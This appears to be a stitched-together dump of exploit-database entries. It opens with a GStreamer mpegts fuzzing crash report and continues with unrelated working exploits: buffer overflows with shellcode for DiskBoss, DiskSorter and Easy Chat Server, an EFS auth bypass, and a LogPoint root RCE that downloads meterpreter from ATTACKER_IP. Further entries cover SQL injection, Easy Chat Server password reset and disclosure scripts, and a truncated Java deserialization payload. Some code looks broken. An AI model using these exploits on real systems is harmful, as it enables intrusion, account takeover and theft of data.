Source: https://bugzilla.gnome.org/show_bug.cgi?id=775120
The attached file will cause a null pointer access and segfault in the mpegts parser. Current git code, found with afl.
ASAN stack trace:
=================================================================
==32545==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe957185495 bp 0x60200002cf7a sp 0x7fe956e027a0 T2)
==32545==The signal is caused by a WRITE memory access.
==32545==Hint: address points to the zero page.
#0 0x7fe957185494 in _parse_pat /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:441:32
#1 0x7fe957184058 in __common_section_checks /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:166:9
#2 0x7fe95718522f in gst_mpegts_section_get_pat /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:480:9
#3 0x7fe957438b9a in mpegts_base_apply_pat /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:942:20
#4 0x7fe957438b9a in mpegts_base_handle_psi /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1155
#5 0x7fe957437cd1 in mpegts_base_chain /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1424:11
#6 0x7fe9574341e7 in mpegts_base_loop /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1589:13
#7 0x7fe9644305c3 in gst_task_func /f/gstreamer/gstreamer/gst/gsttask.c:334:5
#8 0x7fe96362f867 (/usr/lib64/libglib-2.0.so.0+0x70867)
#9 0x7fe96362eed4 (/usr/lib64/libglib-2.0.so.0+0x6fed4)
#10 0x7fe9630ac443 in start_thread (/lib64/libpthread.so.0+0x7443)
#11 0x7fe962bdb92c in clone (/lib64/libc.so.6+0xe792c)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:441:32 in _parse_pat
Thread T2 (tsdemux0:sink) created by T1 (typefind:sink) here:
#0 0x42e26d in __interceptor_pthread_create (/usr/bin/gst-discoverer-1.0+0x42e26d)
#1 0x7fe96364cadf (/usr/lib64/libglib-2.0.so.0+0x8dadf)
Thread T1 (typefind:sink) created by T0 here:
#0 0x42e26d in __interceptor_pthread_create (/usr/bin/gst-discoverer-1.0+0x42e26d)
#1 0x7fe96364cadf (/usr/lib64/libglib-2.0.so.0+0x8dadf)
==32545==ABORTING
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42162.zip
#!/usr/bin/python
###############################################################################
# Exploit Title: DiskBoss v8.0.16 - Local Buffer Overflow
# Date: 11-06-2017
# Exploit Author: @abatchy17 -- www.abatchy.com
# Vulnerable Software: DiskBoss v8.0.16 (Freeware, Pro and Ultimate)
# Vendor Homepage: http://www.disksorter.com/
# Version: 8.0.16
# Software Link: http://www.diskboss.com/downloads.html (Freeware, Pro and Ultimate)
# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
#
# To trigger the exploit, click "Search" -> second (+) sign -> "Add Input Directory" and paste the content of exploit.txt
#
# Only difference between this one and 42157 is that EBX is used
#
# Note: No typos!!11!
#
##############################################################################
a = open("exploit.txt", "w")
# Message= 0x65182c15 : jmp ebx | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\DiskBoss\bin\QtGui4.dll)
jmpebx = "\x15\x2c\x18\x65" # Why JMP EBX? Buffer at ESP is split, bad!
badchars = "\x0a\x0d\x2f"
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
buf = ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
llamaleftovers = (
"\x53" # push EBX
"\x58" # pop EAX
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = EBX + 233, shellcode generated should start exactly at EAX as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)
junk = "\x53\x5b" * 119 + "\x53"
data = "A"*4096 + jmpebx + "C"*16 + jmpebx + "C"*(5296 - 4096 - 4 - 16 - 4) + llamaleftovers + junk + buf
a.write(data)
a.close()
# Exploit Title: EFS Web Server 7.2 Authentication Bypass
# Date: 11-06-2017
# Software Link: http://www.sharing-file.com/efssetup.exe
# Software Version : 7.2
# Exploit Author: Touhid M.Shaikh
# Contact: http://twitter.com/touhidshaikh22
# Website: http://touhidshaikh.com/
######## Description ########
<!--
What is Easy File Sharing Web Server 7.2 ?
Easy File Sharing Web Server is a file sharing software that allows
visitors to upload/download files easily through a Web Browser. It can help
you share files with your friends and colleagues. They can download files
from your computer or upload files from theirs.They will not be required to
install this software or any other software because an internet browser is
enough. Easy File Sharing Web Server also provides a Bulletin Board System
(Forum). It allows remote users to post messages and files to the forum.
The Secure Edition adds support for SSL encryption that helps protect
businesses against site spoofing and data corruption.
-->
######## Video PoC and Article ########
https://www.youtube.com/watch?v=XlTH7Fm1m1w
http://touhidshaikh.com/blog/poc/EFSwebservr-authbypass/
######## Attact Description ########
<!--
Note: No Need to Login...bcz this is auth bypass vulnerability .hehehe.
==>START<==
Any visitor..
We can Bypass the Login Screen by just Change the URL and Browse the
Drives.
bingoo...
-->
######## Proof of Concept ########
When we visit the EFS web server its prompt for login, now attacker just
change url to below.
Exploit....
http://192.168.1.14/disk_c/
in this case change drvie by just change /disk_c to /disk_<Drive latter>
example. /disk_d , /disk_f etc
=============================================
NOTE :: ::
Now We have Permission to View Drives and Folder and Download Files. in
Diffrent Drives or folder.
============================================
_____ ___ _ _ _ _ ___ ____
|_ _/ _ \| | | | | | |_ _| _ \
| || | | | | | | |_| || || | | |
| || |_| | |_| | _ || || |_| |
|_| \___/ \___/|_| |_|___|____/
Touhid Shaikh.......
# Exploit Title: Unauthenticated remote root code execution on logpoint < 5.6.4
# Date: 11/06/17
# Exploit Author: agix
# Vendor Homepage: https://www.logpoint.com
# Version: logpoint < 5.6.4
# Tested on: 5.6.2
# Vendor contact 19/04
# Exploit details sent to the vendor 24/04
# Patch in test mode 05/05
# Patch release to public 08/05
# run python -m SimpleHTTPServer to serve second stage of the exploit in a file named e
# to get root code execution this is the second stage e
# wget http://YOUR_WEB_SERVER:8000/meterpreter -O /tmp/met && chmod 755 /tmp/met && sudo /opt/immune/installed/system/root_actions/create_symlink.sh /tmp/met /opt/immune/installed/system/root_actions/met ; sudo /opt/immune/installed/system/root_actions/met
# it downloads a third stage executed as root
import time
import zmq
import sys
import json
import random
import string
import base64
ATTACKER_IP = '172.16.171.1'
LOGPOINT_IP = '172.16.171.204'
def crash():
context = zmq.Context()
sock = context.socket(zmq.DEALER)
sock.connect("tcp://%s:5504"%LOGPOINT_IP)
sock.send('crash')
crash()
time.sleep(1)
context = zmq.Context()
sock2 = context.socket(zmq.DEALER)
sock2.connect("tcp://%s:5504"%LOGPOINT_IP)
name = ''.join(random.choice(string.ascii_uppercase) for _ in range(6))
cmd1 = base64.b64encode('wget http://%s:8000/e -O /tmp/e'%ATTACKER_IP)
cmd2 = base64.b64encode('cat /tmp/e')
exploit = '%s"; $(echo -n %s | base64 -d) && $(echo -n %s | base64 -d) | bash ; echo "test'%(name, cmd1, cmd2)
tosend = json.dumps({"request_id": name, "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "add", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
print tosend
sock2.send(tosend)
print sock2.recv()
time.sleep(30)
# cleaning
tosend = json.dumps({"request_id": name+"-1", "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "delete", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
print tosend
sock2.send(tosend)
print sock2.recv()
#!/usr/bin/python
###############################################################################
# Exploit Title: DiskSorter v9.7.14 - Local Buffer Overflow
# Date: 10-06-2017
# Exploit Author: abatchy17 -- @abatchy17
# Vulnerable Software: DiskSorter v9.7.14
# Vendor Homepage: http://www.disksorter.com/
# Version: 9.7.14
# Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
# Tested On: Windows XP SP3
#
# To trigger the exploit, paste the content of exploit.txt into "Add Input Directory" text box
#
# Credit to n3ckD_ for discovering the DoS exploit
#
# Challenges to convert this DoS to code execution:
# 1. Program doesn't accept non ASCII characters (0x01 to 0xff are okay-ish)
# 2. Buffer at ESP splits string if it contains a "\", this is bad since POP ESP is 0x5c
# 3. Had to write custom shellcode to get the exact location of alphanumeric shellcode in memory
#
# +----------------------------------+
# |1 custom shellcode == 1 dead llama|
# +----------------------------------+
#
##############################################################################
a = open("exploit.txt", "w")
# Message= 0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
badchars = "\x0a\x0d\x2f"
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
buf = ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
jmpebp = "\x1f\x54\x1c\x65" # Why JMP EBP? Buffer at ESP is split, bad!
llamaleftovers = (
"\x55" # push EBP
"\x58" # pop EAX
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = EBP + 209
"\x40" # inc EAX, shellcode generated should start exactly here (EBP + 210) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)
junk = "\x55" + + "\x53\x5b" * 105
data = "A"*4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf
a.write(data)
a.close()
# Exploit Title: [PaulShop CMS <= 2017-03-25 Sql Injection]
# Date: [10-06-2017]
# Exploit Author: [Se0pHpHack3r]
# Vendor Homepage: [https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714]
# Version: [2017-03-25]
1. Description
SQL Injection on Shipping Cost page in Cart, with "country" & "weight" parameter (GET)
2. Examples
http://localhost/shop/en/cart/shipping_cost?country=[SQL INJECTION HERE]
http://localhost/shop/en/cart/shipping_cost?country=TH&weight=[SQL INJECTION HERE]
# Exploit Title: Easy Chat Server User Registeration Buffer Overflow (SEH)
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Buffer Overflow
# Severity: Critical
# Tested on: [Windows XP Sp3 Eng]
# ======================================================================================================================
# Username parameter in Registeration page 'register.ghp' is prone to a stack-based buffer-overflow vulnerability.
# Application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.
# ======================================================================================================================
# USAGE: python exploit.py ip
#!/usr/bin/python
import os
import sys
import socket
ip = sys.argv[1]
socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
socket.connect((ip , 80))
#AlphanumericShellcode
shellcode = ("\x89\xe2\xda\xde\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x43\x43"
"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x32\x55\x50\x33"
"\x30\x35\x50\x43\x50\x4d\x59\x5a\x45\x36\x51\x4f\x30\x32\x44"
"\x4c\x4b\x30\x50\x50\x30\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x30"
"\x52\x44\x54\x4c\x4b\x44\x32\x36\x48\x34\x4f\x58\x37\x50\x4a"
"\x31\x36\x36\x51\x4b\x4f\x4e\x4c\x47\x4c\x43\x51\x33\x4c\x43"
"\x32\x46\x4c\x51\x30\x39\x51\x48\x4f\x34\x4d\x45\x51\x48\x47"
"\x4d\x32\x4c\x32\x50\x52\x56\x37\x4c\x4b\x31\x42\x42\x30\x4c"
"\x4b\x31\x5a\x47\x4c\x4c\x4b\x30\x4c\x54\x51\x42\x58\x4a\x43"
"\x47\x38\x35\x51\x48\x51\x36\x31\x4c\x4b\x46\x39\x37\x50\x55"
"\x51\x49\x43\x4c\x4b\x50\x49\x35\x48\x4b\x53\x57\x4a\x37\x39"
"\x4c\x4b\x50\x34\x4c\x4b\x53\x31\x38\x56\x56\x51\x4b\x4f\x4e"
"\x4c\x49\x51\x38\x4f\x44\x4d\x53\x31\x39\x57\x37\x48\x4b\x50"
"\x32\x55\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d\x31"
"\x34\x43\x45\x5a\x44\x46\x38\x4c\x4b\x31\x48\x51\x34\x33\x31"
"\x58\x53\x42\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x46\x38\x35"
"\x4c\x35\x51\x4e\x33\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x4e\x30"
"\x4d\x59\x30\x44\x31\x34\x37\x54\x31\x4b\x51\x4b\x53\x51\x31"
"\x49\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x51\x4f\x51\x4f\x50\x5a"
"\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x51\x4d\x55\x38\x46\x53\x36"
"\x52\x35\x50\x55\x50\x45\x38\x32\x57\x32\x53\x30\x32\x51\x4f"
"\x56\x34\x33\x58\x30\x4c\x32\x57\x56\x46\x44\x47\x4b\x4f\x58"
"\x55\x4f\x48\x4c\x50\x35\x51\x43\x30\x43\x30\x37\x59\x4f\x34"
"\x50\x54\x50\x50\x32\x48\x37\x59\x4b\x30\x32\x4b\x55\x50\x4b"
"\x4f\x59\x45\x53\x5a\x33\x38\x50\x59\x50\x50\x5a\x42\x4b\x4d"
"\x51\x50\x36\x30\x31\x50\x36\x30\x45\x38\x4b\x5a\x54\x4f\x39"
"\x4f\x4b\x50\x4b\x4f\x38\x55\x4c\x57\x52\x48\x53\x32\x45\x50"
"\x44\x51\x31\x4c\x4b\x39\x4b\x56\x52\x4a\x52\x30\x50\x56\x56"
"\x37\x33\x58\x58\x42\x39\x4b\x46\x57\x55\x37\x4b\x4f\x39\x45"
"\x51\x47\x43\x58\x4f\x47\x4b\x59\x30\x38\x4b\x4f\x4b\x4f\x59"
"\x45\x51\x47\x42\x48\x54\x34\x5a\x4c\x57\x4b\x4b\x51\x4b\x4f"
"\x48\x55\x30\x57\x5a\x37\x42\x48\x32\x55\x52\x4e\x30\x4d\x45"
"\x31\x4b\x4f\x38\x55\x35\x38\x35\x33\x52\x4d\x45\x34\x45\x50"
"\x4b\x39\x4d\x33\x56\x37\x31\x47\x56\x37\x46\x51\x5a\x56\x32"
"\x4a\x44\x52\x56\x39\x31\x46\x5a\x42\x4b\x4d\x53\x56\x39\x57"
"\x30\x44\x51\x34\x57\x4c\x35\x51\x33\x31\x4c\x4d\x37\x34\x57"
"\x54\x32\x30\x58\x46\x35\x50\x51\x54\x50\x54\x30\x50\x31\x46"
"\x51\x46\x36\x36\x31\x56\x36\x36\x30\x4e\x36\x36\x51\x46\x31"
"\x43\x46\x36\x43\x58\x33\x49\x48\x4c\x47\x4f\x4b\x36\x4b\x4f"
"\x58\x55\x4c\x49\x4d\x30\x30\x4e\x36\x36\x47\x36\x4b\x4f\x56"
"\x50\x32\x48\x33\x38\x4c\x47\x35\x4d\x35\x30\x4b\x4f\x49\x45"
"\x4f\x4b\x4a\x50\x48\x35\x59\x32\x50\x56\x52\x48\x4f\x56\x5a"
"\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58\x55\x37\x4c\x53\x36\x33\x4c"
"\x44\x4a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x45\x55\x4f\x4b\x37"
"\x37\x34\x53\x52\x52\x32\x4f\x53\x5a\x35\x50\x36\x33\x4b\x4f"
"\x4e\x35\x41\x41")
magic = "B" * 217
magic += "\xeb\x06\x90\x90"
magic += "\xBC\x04\x01\x10"
magic += shellcode
magic += "C" * 200
buffer = "POST /registresult.htm HTTP/1.1\r\n\r\n"
buffer += "Host: 192.168.1.11"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
buffer += "Accept-Language: en-US,en;q=0.5"
buffer += "Accept-Encoding: gzip, deflate"
buffer += "Referer: http://192.168.1.11/register.ghp"
buffer += "Connection: close"
buffer += "Content-Type: application/x-www-form-urlencoded"
buffer += "UserName=" + magic +"&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"
socket.send(buffer)
data = socket.recv(4096)
print data
socket.close()
# Exploit Title: Easy Chat Server Remote Password Reset
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Pre-Auth Remote Password Reset
# Severity: Critical
# ====================================================================================================
# Registeration page 'register.ghp' allows resetting ANY user's password.
# Remote un-authenticated attackers can send HTTP POST requests to Hijack ANY Easy Chat Server account.
# ====================================================================================================
# USAGE: python exploit.py ip port username password
#!/usr/bin/python
import os,sys,socket
ip = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
socket.connect((ip , 80))
buffer = "POST /registresult.htm HTTP/1.1"
buffer += "Host: 192.168.1.11"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
buffer += "Accept-Language: en-US,en;q=0.5"
buffer += "Accept-Encoding: gzip, deflate"
buffer += "Connection: close"
buffer += "Content-Type: application/x-www-form-urlencoded"
buffer += "UserName=" + username + "&Password=" + password + "&Password1=ggg&Sex=0&Email=%25252540&Icon=image17.gif&Resume=aaa&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change"
socket.send(buffer)
socket.close()
print "[#] Password Changed Successfully"
# Exploit Title: Easy Chat Server Remote Password Disclosure
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Pre-Auth Remote Password Disclosure
# Severity: Critical
# =========================================================================================================
# Registeration page 'register.ghp' allows disclosing ANY user's password.
# Remote un-authenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user password.
# =========================================================================================================
# USAGE: python exploit.py ip username
#!/usr/bin/python
import urllib
import re
import requests
import sys
ip = sys.argv[1]
username = sys.argv[2]
url = 'http://' + ip + '/register.ghp?username=' + username + '&password='
response = requests.get(url)
html = response.content
pattern = '<INPUT type="password" name="Password" maxlength="30" value="(.+?)">'
result = re.compile(pattern)
password = re.findall(result,html)
x = ''.join(password)
password = x.replace("[", "")
password = x.replace("]", "")
print "Password: " + password
#!/usr/bin/env python
import socket
import sys
import ssl
def getHeader():
return '\x4a\x52\x4d\x49\x00\x02\x4b'
def payload():
cmd = sys.argv[4]
cmdlen = len(cmd)
data2 = '\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x00\x00\x00\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf\x74\x00\x05\x70\x77\x6e\x65\x64\x73\x7d\x00\x00\x00\x01\x00\x0f\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x52\x65\x6d\x6f\x74\x65\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x70\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\x7e\x00\x00\x73\x71\x00\x7e\x00\x05\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x70\x78\x71\x00\x7e\x00\x02\x73\x71\x00\x7e\x00\x05\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x